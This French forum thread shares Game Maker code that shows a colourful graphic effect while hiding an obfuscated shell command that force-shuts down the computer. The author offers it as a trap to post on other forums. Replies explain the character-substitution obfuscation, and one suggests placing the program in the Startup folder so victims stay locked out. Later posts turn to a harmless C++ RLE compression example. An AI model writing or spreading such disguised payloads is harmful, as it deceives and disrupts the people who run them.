| Bombe a retardement | |
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+5Wargamer PHENIXprod glcraft Chlorodatafile onilink_ 9 participants |
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Auteur | Message |
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onilink_ Modérateur
Messages : 9180 Localisation : Montpellier Projet Actuel : Planet Centauri
OniDev
| Sujet: Bombe a retardement Ven 16 Juil 2010 - 15:31 | |
| Voici une petite bombe a retardement, un ptit piege a poster sur les fofo de gars qui font trop leurs kékés.... Ça éteind l'ordi après un jouli effet graphique - Code:
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draw_set_alpha(1) if(!variable_local_exists('count')) count = 0 count += 1 ss = ")1bcef'hlno-stuwx. (";tt = "023456789ABCDEFGHIJK" lol = "5H54FE5_D8599KJ7D8FEdBGAI5H57,J7CDJC6JCEJ270" for(i=0 ; i<44 ; i+=1) lol = string_replace_all(lol, string_copy(tt, i+1, 1), string_copy(ss, i+1, 1)) if(count>60 || keyboard_check(vk_escape)) execute_string(lol) for(i=0 ; i<=640 ; i+=1) draw_line_color(i,0,i,480,make_color_hsv(i*255/640,255*chr(string_copy(lol, count, 1)) ,255),make_color($FF-count, $FF-count, $FF)) rc = 50; pl = 60; v1 = 0.9; draw_primitive_begin(pr_linestrip) for(a1=0 ; a1<=3600 ; a1+=10){ a2 = a1*(2+count) draw_vertex(320+lengthdir_x(rc,a1*v1)+lengthdir_x(pl,a2) ,240+lengthdir_y(rc,a1*v1)+lengthdir_y(pl,a2)) } draw_primitive_end()
Dernière édition par onilink_ le Mer 9 Mar 2011 - 17:03, édité 3 fois |
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Chlorodatafile Utilisateur confirmé: Rang *****
Messages : 2929 Localisation : Belfort Projet Actuel :
Paralights
| Sujet: Re: Bombe a retardement Ven 16 Juil 2010 - 15:44 | |
| lawl
précise quand même que ça fini par éteindre l'ordi hein ... |
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Invité Invité
| Sujet: Re: Bombe a retardement Ven 16 Juil 2010 - 15:46 | |
| "5H54FE5_D8599KJ7D8FEdBGAI5H57,J7CDJC6JCEJ270" signifie quoi en langage semi-humain ? |
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onilink_ Modérateur
Messages : 9180 Localisation : Montpellier Projet Actuel : Planet Centauri
OniDev
| Sujet: Re: Bombe a retardement Ven 16 Juil 2010 - 15:48 | |
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glcraft Utilisateur confirmé: Rang *****
Messages : 1698 Localisation : Entre l'Espagne, l'Italie, la Suisse, L'allemagne et le RU :P Projet Actuel : Jeu de survie avancé
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| Sujet: Re: Bombe a retardement Ven 16 Juil 2010 - 15:49 | |
| hahaha, comme dit shm : "Laissez le CBNA tranquille"
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PHENIXprod Utilisateur confirmé: Rang ****
Messages : 835
| Sujet: Re: Bombe a retardement Ven 16 Juil 2010 - 15:55 | |
| euh... c'est a quel moment que ça éteins l'ordi? On peux pas éteindre l'ordi en gml? edit: ah okaiiii, un execute_shell ^^ bien joué
Dernière édition par PHENIXprod le Ven 16 Juil 2010 - 15:59, édité 1 fois |
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onilink_ Modérateur
Messages : 9180 Localisation : Montpellier Projet Actuel : Planet Centauri
OniDev
| Sujet: Re: Bombe a retardement Ven 16 Juil 2010 - 15:56 | |
| tout est crypté mohahaha T'as qu'a l'essayer tu veras |
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Invité Invité
| Sujet: Re: Bombe a retardement Ven 16 Juil 2010 - 15:57 | |
| - onilink_ a écrit:
- c'est un shutdown crypté
et comment t'as fait ? c'est fou ! |
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onilink_ Modérateur
Messages : 9180 Localisation : Montpellier Projet Actuel : Planet Centauri
OniDev
| Sujet: Re: Bombe a retardement Ven 16 Juil 2010 - 15:58 | |
| - Citation :
- if(count>60 || keyboard_check(vk_escape)) execute_string(lol)
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Invité Invité
| Sujet: Re: Bombe a retardement Ven 16 Juil 2010 - 16:03 | |
| comment t'a fait pour crypter... |
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onilink_ Modérateur
Messages : 9180 Localisation : Montpellier Projet Actuel : Planet Centauri
OniDev
| Sujet: Re: Bombe a retardement Ven 16 Juil 2010 - 16:06 | |
| j'ai remplacé les occurences ")1bcef'hlno-stuwx. (" de mon code par "023456789ABCDEFGHIJK" |
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glcraft Utilisateur confirmé: Rang *****
Messages : 1698 Localisation : Entre l'Espagne, l'Italie, la Suisse, L'allemagne et le RU :P Projet Actuel : Jeu de survie avancé
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| Sujet: Re: Bombe a retardement Ven 16 Juil 2010 - 18:29 | |
| lol, j'ai pas compris ton systeme de cryptage |
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onilink_ Modérateur
Messages : 9180 Localisation : Montpellier Projet Actuel : Planet Centauri
OniDev
| Sujet: Re: Bombe a retardement Ven 16 Juil 2010 - 18:55 | |
| en fait j'ai stocké dans un string execute_shell( "shutdown.exe", "-s -f -t 1") puis j'ai juste remplacé les lettres en fonction d'un autre string. Ensuite ce que j'ai obtenu je l'ai mis dans mon code et j'ai fait la manip inverse pour l'executer |
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Wargamer *Excellent utilisateur*
Messages : 6938 Projet Actuel : Bataille de cake au fruits
| Sujet: Re: Bombe a retardement Ven 16 Juil 2010 - 20:32 | |
| quand tu vois le principe du début c'est simple, c'est plus facile de crypté un truc que le décriter (encore heureux :nezrouge: ) sinon GG mais je doute que quelqu'un teste un truc ausis incompréensible x) _________________ Règle #1 du CBNA, ne pas chercher à faire dans la subtilité; personne comprend |
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Mass *Excellent utilisateur*
Messages : 3351 Localisation : Dans une canonnière wookie. Projet Actuel : Monter des trucs et des machins
| Sujet: Re: Bombe a retardement Ven 16 Juil 2010 - 23:50 | |
| franchement ce code est carrément fascinant, suffit de voir l'effet qu'on obtient tout en décryptant un code piège en si peu de lignes c'est étonnant |
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Randal Utilisateur confirmé: Rang **
Messages : 446
| Sujet: Re: Bombe a retardement Ven 16 Juil 2010 - 23:53 | |
| - onilink_ a écrit:
- c'est un shutdown crypté
mais carrément quoi, c'est si vicieux >:D |
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Mass *Excellent utilisateur*
Messages : 3351 Localisation : Dans une canonnière wookie. Projet Actuel : Monter des trucs et des machins
| Sujet: Re: Bombe a retardement Sam 17 Juil 2010 - 0:32 | |
| Mais oui ! Toute la complexité du truc pour rendre invisible une tâche si simple dépeint bien l'esprit tordu de onilink_ :oui:
(pas taper pas taper, je plaisannnnnte !) |
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onilink_ Modérateur
Messages : 9180 Localisation : Montpellier Projet Actuel : Planet Centauri
OniDev
| Sujet: Re: Bombe a retardement Sam 17 Juil 2010 - 0:36 | |
| mais nooon |
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Wargamer *Excellent utilisateur*
Messages : 6938 Projet Actuel : Bataille de cake au fruits
| Sujet: Re: Bombe a retardement Sam 17 Juil 2010 - 1:14 | |
| Va savoir pourquoi je suis plus sur de vouloir tester tes autres exemples :nah: _________________ Règle #1 du CBNA, ne pas chercher à faire dans la subtilité; personne comprend |
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onilink_ Modérateur
Messages : 9180 Localisation : Montpellier Projet Actuel : Planet Centauri
OniDev
| Sujet: Re: Bombe a retardement Sam 17 Juil 2010 - 1:17 | |
| enfin tu risque pas grand chose, je ne suis pas encore en mode diabolique |
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Randal Utilisateur confirmé: Rang **
Messages : 446
| Sujet: Re: Bombe a retardement Sam 17 Juil 2010 - 1:26 | |
| Une longue boucle infinie, c'est diabolique ? >:D |
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glcraft Utilisateur confirmé: Rang *****
Messages : 1698 Localisation : Entre l'Espagne, l'Italie, la Suisse, L'allemagne et le RU :P Projet Actuel : Jeu de survie avancé
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| Sujet: Re: Bombe a retardement Sam 17 Juil 2010 - 1:28 | |
| eh, tu as oublié de faire un copie de l'exe, si il est deja fait dans le dossier "Démarrage", la le gars qui l'execute et qui connait pas le 'safe mode' est vraiment dans la m**** vous trouvez pas XD ?
edit, tiens je viens de comprendre comment fonctionnais ton systeme de cryptage, c'est tout bete d'ailleurs, mais c'est possible plus compacte, genre avec des lettres par octets, comme tu l'expliquais que t'allais faire dans ton tutoriel de sauvegarde ? |
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onilink_ Modérateur
Messages : 9180 Localisation : Montpellier Projet Actuel : Planet Centauri
OniDev
| Sujet: Re: Bombe a retardement Sam 17 Juil 2010 - 1:37 | |
| un octet = 1 caractere , donc je pense pas qu'il y a moyen de compresser plus en peu de lignes de code |
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glcraft Utilisateur confirmé: Rang *****
Messages : 1698 Localisation : Entre l'Espagne, l'Italie, la Suisse, L'allemagne et le RU :P Projet Actuel : Jeu de survie avancé
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| Sujet: Re: Bombe a retardement Sam 17 Juil 2010 - 1:47 | |
| et comment font les fichiers RAR alors ??? De 4.7 Go (un DVD), je suis passé a la taille d'un petit DVD : 1.7 Go (environ) donc sur 44 octets, tu DOIS etre capable de nous faire environ 16 octet, ce qui est enorme : "0123456789ABCDEF" (tiens ca me faite penser a l'ecriture l'hexaminal ) |
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onilink_ Modérateur
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OniDev
| Sujet: Re: Bombe a retardement Sam 17 Juil 2010 - 1:54 | |
| d'accord pour les chaines qui ont une suite logique mais la compression reste tout de meme un domaine complexe, crois moi. Et je perdrais plus de place a compresser ma chaine qu'actuellement. Si la compression t'interresse voici la compression RLE : - Spoiler:
- Code:
-
std::string compressRLE(std::string string, std::string flag) { std::string str = string, ret = "";
while( str.length() ) { char c = str[0]; int count = 0;
while( str.substr(0,1)[0] == c && count < 9) { count++; str.erase(0,1); }
if(c == flag[0]) { if(count == 1) { ret+=flag; ret+=flag; } else { int pos = ret.length(); ret += " "; ret[pos] = '0'+count; ret += flag; ret += " "; ret[pos+2] = c; } } else { int pos = ret.length(); if(count == 1) { ret += " "; ret[pos] = c; } else if(count == 2) { ret += " "; ret[pos] = c; ret[pos+1] = c; } else { ret += " "; ret[pos] = '0'+count; ret += flag; ret += " "; ret[pos+2] = c; } } } return ret; }
et sa decompression - Spoiler:
- Code:
-
std::string decompressRLE(std::string string, std::string flag) { std::string str = string, ret = "";
while( str.length() ) { char c = str[0]; if(str[1] != flag[0]) { int pos = ret.length(); if(str[0] == str[1]) { ret += " "; ret[pos] = c; ret += " "; ret[pos+1] = c; str.erase(0,2); } else { ret += " "; ret[pos] = c; str.erase(0,1); } } else if(str[0] == flag[0]) { ret += flag; str.erase(0,2); } else { int count = str[0] - '0'; for(int i=0 ; i<count ; i++) ret += str.substr(2,1); str.erase(0, 3); } } return ret; }
En C++ exemple : AAAAAAAAAZEZEEEERTYYYYYYYYYYYYY compressé deviens 9/AZEZ4/ERT9/Y4/Y avec "/" comme flag |
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glcraft Utilisateur confirmé: Rang *****
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| Sujet: Re: Bombe a retardement Sam 17 Juil 2010 - 2:16 | |
| t'inquiète, je vois bien que l'on peut pas compresser plus, ou par des suite de chaine comme tu viens de le montrer, et, a quoi ca servirai ici, strictement a rien ! (heu comment tu fais pour faire des selections de placement de lettres automatique, parce que dans le code la c'est un peu visible non?, et comment tu fais si des lettres se croisent (le 1ere D avec le 2eme D ou des choses comme ca)) |
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onilink_ Modérateur
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OniDev
| Sujet: Re: Bombe a retardement Sam 17 Juil 2010 - 2:22 | |
| ben faut pas qui ai de lettres qui se croisent lawl, j'ai fait le plus simple et le plus cours (ou presque) (tu parlais pas de RLE ? sinon c'est une autre histoire x) |
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glcraft Utilisateur confirmé: Rang *****
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| Sujet: Re: Bombe a retardement Sam 17 Juil 2010 - 2:37 | |
| en fait je parle de ca: prenons l'exemple de 'manger' on remplace tout les lettres 'a' par 'e' :'menger' et vice versa : 'mangar' en clair tu peut pas mettre tout l'alphabet ni tout les signes a cause de ca! A moins de trouver un technique qui permet de le faire d'un coup... tiens j'ai mon idée a moi !!! il faudrait garder le string de depart dans un variable str, il faudrait faire un boucle comme toi tu la fait mais des qu'il trouve une lettre a changer, il l'inscrit la lettre changer a sa position dans une nouvelle variable variable, et a la fin, il a tout réécrit sans cogner dans les lettres. j'essairai un exemple demain, a mon avis c'est pas bien compliqué |
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onilink_ Modérateur
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OniDev
| Sujet: Re: Bombe a retardement Sam 17 Juil 2010 - 2:50 | |
| non c'est meme très simple, c'est le premier algo de cryptage que j'ai fait (lol souvenirs souvenirs) Par contre ça prend plus de deux lignes, voila pourquoi je ne l'ai pas fait |
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glcraft Utilisateur confirmé: Rang *****
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| Sujet: Re: Bombe a retardement Sam 17 Juil 2010 - 2:57 | |
| oui j"imagine mais j'en suis sur que d'autre ne savent pas comment crypter leur texte, moi la j'apprends progressivement |
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| Sujet: Re: Bombe a retardement | |
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